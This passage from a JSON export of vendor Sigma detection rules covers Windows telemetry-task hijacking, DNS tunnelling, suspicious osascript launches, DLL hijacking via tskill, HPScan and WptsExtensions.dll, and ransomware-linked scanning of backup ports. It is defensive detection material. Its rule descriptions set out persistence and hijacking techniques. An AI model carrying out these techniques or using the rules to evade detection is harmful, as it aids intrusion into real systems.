"hl_testing_start_time": "2026-03-23T11:45:34.075020Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_process_persistence_telemetry_hijack.yml",
"content": "title: Microsoft Compatibility Appraiser Scheduled Task Hijacked Process\nid: e344342c-978e-4bf2-b1b3-d96d716b5363\ndescription: |\n Detects the hijacking of the Microsoft Compatibility Appraiser scheduled task (also known as Windows Telemetry) with a custom command.\n This task is typically set to run once a day and requires administrative privileges, as it involves creating a new registry entry in HKLM. The malicious command is executed as a child process of CompatTelRunner.exe, a legitimate process associated with the task.\n This rule identifies unauthorized modifications to the scheduled task, which is often used by adversaries to execute malicious payloads. The custom command can be indicative of malicious activities such as persistence, privilege escalation, or data exfiltration.\n It is recommended to investigate the source of the modification, analyze the command-line arguments of the custom command, review the process tree to identify any suspicious behavior, and reset the scheduled task to its default configuration.\nreferences:\n - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2020/09/29\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.ScheduledTask\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\compattelrunner.exe'\n\n exclusion_rundll:\n # rundll32 C:\\Windows\\system32\\generaltel.dll,RunInUserCxt WrMEazCLDEecukhj.1 Census\n # rundll32 C:\\Windows\\system32\\GeneralTel.dll,RunInUserCxt ZmmKYGDmyEaZ9VmQ.1.1.2 {DFF3552F-9DB5-46D6-B319-E936518CD395} {DA76D0E0-22C5-454B-97B6-406355D75C2F} IsAdmin WAMAccountCount\n # C:\\Windows\\system32\\rundll32.exe C:\\Windows\\system32\\GeneralTel.dll,RunGeneralTelemetry -cV ka/CLOtQeUyPdoUR.1.2 -SendFullTelemetry -ThrottleUtc -TelemetryAllowed -MarkersNotAllowed\n Image|endswith: '\\rundll32.exe'\n CommandLine:\n - '*generaltel.dll,RunInUserCxt *'\n - '*generaltel.dll,RunGeneralTelemetry *'\n # Signed: 'true'\n exclusion_dismhost:\n # C:\\Windows\\TEMP\\CCB5149E-DF4F-4D28-AE32-6F8E1FC5439B\\dismhost.exe {7E7BBF9D-E772-4D82-BAF9-E95D3CDCAD19}\n Image|endswith: 'DismHost.exe'\n # Signed: 'true'\n exclusion_powershell:\n # powershell.exe -ExecutionPolicy Restricted -Command \"$Res = 0; $VDisks = (Get-VirtualDisk | Where-Object ResiliencySettingName -eq Parity); if ($null -ne $VDisks) { $Res = 1 }; Write-Host 'Final result:',$Res;\"\n # powershell.exe C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell.exe -ExecutionPolicy Restricted -Command Write-Host \"Final result: 1\";\n Image|endswith: '\\powershell.exe'\n # Signed: 'true'\n CommandLine|contains: ' -ExecutionPolicy Restricted -Command '\n exclusion_conhost:\n # C:\\Windows\\System32\\conhost.exe\n Image|contains: 'Windows\\system32\\conhost.exe'\n # Signed: 'true'\n exclusion_compattelrunner:\n # C:\\Windows\\system32\\compattelrunner.exe -m:GeneralTel.dll -f:RunGeneralTelemetry -cV vCoyb+WnQE6Jl8PV.1.2 -SendFullTelemetry -ThrottleUtc\n Image:\n - '*\\system32\\compattelrunner.exe'\n # 'c:\\Windows\\winsxs\\amd64_microsoft-windows-a..xperience-inventory_31bf3856ad364e35_6.1.7601.24535_none_e8e44c62fea3e082\\CompatTelRunner.exe'\n - '?:\\Windows\\winsxs\\amd64_microsoft-windows*\\CompatTelRunner.exe'\n - '?:\\Windows\\winsxs\\x86_microsoft-windows-*\\CompatTelRunner.exe'\n # Signed: 'true'\n exclusion_werfault:\n # C:\\Windows\\system32\\WerFault.exe -u -p 7064 -s 480\n Image|endswith:\n - '\\system32\\WerFault.exe'\n - '\\syswow64\\WerFault.exe'\n # Signed: 'true'\n exclusion_devicecensus:\n # C:\\Windows\\system32\\devicecensus.exe\n Image|endswith: '\\system32\\devicecensus.exe'\n # Signed: 'true'\n exclusion_diagtrackrunner:\n Image|endswith: '\\windows\\system32\\compattel\\DiagTrackRunner.exe'\n exclusion_aitstatic:\n # Application Impact Telemetry Static Analyzer (by microsoft)\n Image|endswith: '\\Windows\\System32\\aitstatic.exe'\n exclusion_solidworks:\n Image:\n - '?:\\Program Files\\SOLIDWORKS Corp\\SOLIDWORKS PDM\\EdmServer.exe'\n # C:\\Program Files\\SOLIDWORKS 2018\\SOLIDWORKS PDM\\EdmServer.exe\n - '?:\\Program Files\\SOLIDWORKS 20??\\SOLIDWORKS PDM\\EdmServer.exe'\n exclusion_unknown_diag:\n # batch of those 3 commands\n CommandLine:\n - 'dxdiag /t ?:\\WINDOWS\\Temp\\InboxUtilityMP_{47ecb557-ef86-450e-a01d-d2cc01e6b7aa}_dxdiag.txt'\n - 'powercfg /list'\n - 'ipconfig /all'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e344342c-978e-4bf2-b1b3-d96d716b5363",
"rule_name": "Microsoft Compatibility Appraiser Scheduled Task Hijacked Process",
"rule_description": "Detects the hijacking of the Microsoft Compatibility Appraiser scheduled task (also known as Windows Telemetry) with a custom command.\nThis task is typically set to run once a day and requires administrative privileges, as it involves creating a new registry entry in HKLM. The malicious command is executed as a child process of CompatTelRunner.exe, a legitimate process associated with the task.\nThis rule identifies unauthorized modifications to the scheduled task, which is often used by adversaries to execute malicious payloads. The custom command can be indicative of malicious activities such as persistence, privilege escalation, or data exfiltration.\nIt is recommended to investigate the source of the modification, analyze the command-line arguments of the custom command, review the process tree to identify any suspicious behavior, and reset the scheduled task to its default configuration.\n",
"rule_creation_date": "2020-09-29",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e35d4489-1f45-4352-8c90-aee45e3ae5b9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603154Z",
"creation_date": "2026-03-23T11:45:34.603157Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603165Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/",
"https://attack.mitre.org/techniques/T1048/003/",
"https://attack.mitre.org/techniques/T1568/003/"
],
"name": "t1071_004_long_dns_request.yml",
"content": "title: Abnormally Long DNS Name Resolved (Windows)\nid: e35d4489-1f45-4352-8c90-aee45e3ae5b9\ndescription: |\n Detects an abnormally long DNS query that are usually associated with DNS tunneling.\n Adversaries may use DNS protocol to communicate with their C&C.\n It is recommended to check the content of the request and for suspicious behavior by the process making the request.\nreferences:\n - https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1568/003/\ndate: 2024/09/26\nmodified: 2025/09/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n Image|contains: '?'\n QueryName|re: '[a-zA-Z0-9.-]{255}'\n\n filter_space:\n QueryName|re: ' {150}'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_svchost:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k HPZ12'\n\n exclusion_securitygateway:\n ProcessImage|endswith: '\\SecurityGateway\\App\\SecurityGateway.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'MDaemon Technologies, Ltd.'\n QueryName|startswith: 'urldefense.com&key='\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e35d4489-1f45-4352-8c90-aee45e3ae5b9",
"rule_name": "Abnormally Long DNS Name Resolved (Windows)",
"rule_description": "Detects an abnormally long DNS query that are usually associated with DNS tunneling.\nAdversaries may use DNS protocol to communicate with their C&C.\nIt is recommended to check the content of the request and for suspicious behavior by the process making the request.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-09-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3743fcd-fe82-4998-8fa9-11fdc7145cf5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095580Z",
"creation_date": "2026-03-23T11:45:34.095582Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095586Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
"https://gist.github.com/Metnew/09a50c38d398c482b2df59082f0d13c6",
"https://attack.mitre.org/techniques/T1059/002/"
],
"name": "t1059_002_osascript_suspicious_ancestors.yml",
"content": "title: Osascript Spawned from Suspicious Location\nid: e3743fcd-fe82-4998-8fa9-11fdc7145cf5\ndescription: |\n Detects osascript being executed from a suspicious location.\n Osascript is a command-line utility used to execute AppleScript scripts. AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format with the Native APIs NSAppleScript or OSAScript.\n An attacker could use AppleScript to execute other programs or scripts to achieve various behaviors, such as establishing a reverse shell or interacting with remote applications.\n It is recommended to investigate the program that spawned the script, the programs spawned by the script and the script itself to determine whether this action was legitimate.\nreferences:\n - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\n - https://gist.github.com/Metnew/09a50c38d398c482b2df59082f0d13c6\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2024/07/02\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Osascript\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/osascript'\n Ancestors|contains:\n - '/users/shared'\n - '/volumes'\n - '/private/tmp'\n\n exclusion_location_check:\n GrandparentCommandLine: '/Volumes/Player Location Check */Player Location Check.app/Contents/MacOS/Player Location Check'\n\n exclusion_installer:\n ParentImage|startswith:\n - '/private/tmp/PKInstallSandbox.*/Scripts/'\n - '/tmp/pkinstallsandbox.*/Scripts/'\n\n exclusion_legitimate_apps:\n ParentImage:\n - '/var/folders/*/clickshareclient/clickshare.app/Contents/MacOS/clickshare'\n - '/volumes/*/applications/zotero *.app/contents/macos/zotero'\n - '/volumes/cursor installer/cursor.app/contents/macos/cursor'\n - '/volumes/redisinsight/redisinsight.app/contents/macos/redisinsight'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3743fcd-fe82-4998-8fa9-11fdc7145cf5",
"rule_name": "Osascript Spawned from Suspicious Location",
"rule_description": "Detects osascript being executed from a suspicious location.\nOsascript is a command-line utility used to execute AppleScript scripts. AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format with the Native APIs NSAppleScript or OSAScript.\nAn attacker could use AppleScript to execute other programs or scripts to achieve various behaviors, such as establishing a reverse shell or interacting with remote applications.\nIt is recommended to investigate the program that spawned the script, the programs spawned by the script and the script itself to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-07-02",
"rule_modified_date": "2025-03-18",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3935968-27d9-4d1b-bb85-d234fbc3a6fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594227Z",
"creation_date": "2026-03-23T11:45:34.594230Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594238Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tskill.yml",
"content": "title: DLL Hijacking via tskill.exe\nid: e3935968-27d9-4d1b-bb85-d234fbc3a6fc\ndescription: |\n Detects potential Windows DLL Hijacking via tskill.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tskill.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3935968-27d9-4d1b-bb85-d234fbc3a6fc",
"rule_name": "DLL Hijacking via tskill.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tskill.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3b3b1d2-95c2-43b9-881d-10094e000cf5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088994Z",
"creation_date": "2026-03-23T11:45:34.088997Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089004Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_002_persistence_dll_hijack_task_scheduler_wptsextensions.yml",
"content": "title: Task Scheduler Service DLL Hijack Detected\nid: e3b3b1d2-95c2-43b9-881d-10094e000cf5\ndescription: |\n Detects a method to achieve persistence by exploiting the Task Scheduler service without creating a new scheduled task.\n The Task Scheduler attempts to load a non-existent DLL named \"WptsExtensions.dll\" from the System32 directory.\n By creating a malicious DLL with the required exported functions and placing it in System32 directory, an attacker can gain persistent execution with system privileges.\n It is recommended to analyze the loaded DLL for malicious contents and to investigate subsequent actions performed by svchost.exe binary to look for malicious actions.\nreferences:\n - https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2020/09/28\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded: '*\\WptsExtensions.dll'\n Image|endswith: '\\svchost.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3b3b1d2-95c2-43b9-881d-10094e000cf5",
"rule_name": "Task Scheduler Service DLL Hijack Detected",
"rule_description": "Detects a method to achieve persistence by exploiting the Task Scheduler service without creating a new scheduled task.\nThe Task Scheduler attempts to load a non-existent DLL named \"WptsExtensions.dll\" from the System32 directory.\nBy creating a malicious DLL with the required exported functions and placing it in System32 directory, an attacker can gain persistent execution with system privileges.\nIt is recommended to analyze the loaded DLL for malicious contents and to investigate subsequent actions performed by svchost.exe binary to look for malicious actions.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3ed3f5f-02d6-42e9-8592-cf2da12d32c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093843Z",
"creation_date": "2026-03-23T11:45:34.093846Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093850Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/RedDrip7/status/1545245625662418945",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hpscan.yml",
"content": "title: DLL Hijacking via HPScan\nid: e3ed3f5f-02d6-42e9-8592-cf2da12d32c0\ndescription: |\n Detects a potential Windows DLL search order hijacking via HPScan.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n The HPScan tries to load (version.dll) without specifying its absolute path. By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/RedDrip7/status/1545245625662418945\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'HPScan.exe'\n ProcessSignature: 'HP Inc.'\n ImageLoaded|endswith: '\\version.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3ed3f5f-02d6-42e9-8592-cf2da12d32c0",
"rule_name": "DLL Hijacking via HPScan",
"rule_description": "Detects a potential Windows DLL search order hijacking via HPScan.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nThe HPScan tries to load (version.dll) without specifying its absolute path. By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e4357fbe-399f-4671-a1bf-732a2f71a38c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083335Z",
"creation_date": "2026-03-23T11:45:34.083337Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083341Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/",
"https://www.kroll.com/en/insights/publications/cyber/avoslocker-ransomware-update",
"https://attack.mitre.org/techniques/T1595/",
"https://attack.mitre.org/techniques/T1046/"
],
"name": "t1046_softperfect_network_scanner_backup_systems.yml",
"content": "title: Suspicious Network Activity from SoftPerfect Network Scanner\nid: e4357fbe-399f-4671-a1bf-732a2f71a38c\ndescription: |\n Detects suspicious network activity initiated by the SoftPerfect Network Scanner to specific ports related to backup systems.\n This tool is frequently used by ransomware groups to identify backup systems for possible data exfiltration or encryption.\n It is recommended to investigate the parent process to look for malicious content or behavior.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://www.kroll.com/en/insights/publications/cyber/avoslocker-ransomware-update\n - https://attack.mitre.org/techniques/T1595/\n - https://attack.mitre.org/techniques/T1046/\ndate: 2024/02/20\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595\n - attack.discovery\n - attack.t1046\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Tool.SoftPerfect\n - classification.Windows.Behavior.NetworkScan\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessCompany|contains: 'SoftPerfect' # SoftPerfect, SoftPerfect Research, SoftPerfect Pty Ltd\n ProcessProduct:\n - 'Network Scanner'\n - 'SoftPerfect Network Scanner'\n\n DestinationPort:\n - '3527' # VERITAS backup\n - '5000' # DSM (Synology)\n - '6106' # VERITAS backup\n - '9392' # Veeam backup\n - '9393' # Veeam backup\n - '9401' # Veeam backup\n - '9420' # Veeam backup\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e4357fbe-399f-4671-a1bf-732a2f71a38c",
"rule_name": "Suspicious Network Activity from SoftPerfect Network Scanner",
"rule_description": "Detects suspicious network activity initiated by the SoftPerfect Network Scanner to specific ports related to backup systems.\nThis tool is frequently used by ransomware groups to identify backup systems for possible data exfiltration or encryption.\nIt is recommended to investigate the parent process to look for malicious content or behavior.\n",
"rule_creation_date": "2024-02-20",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1595"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e45f88d6-d02f-42b9-b7f4-e484d0347052",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
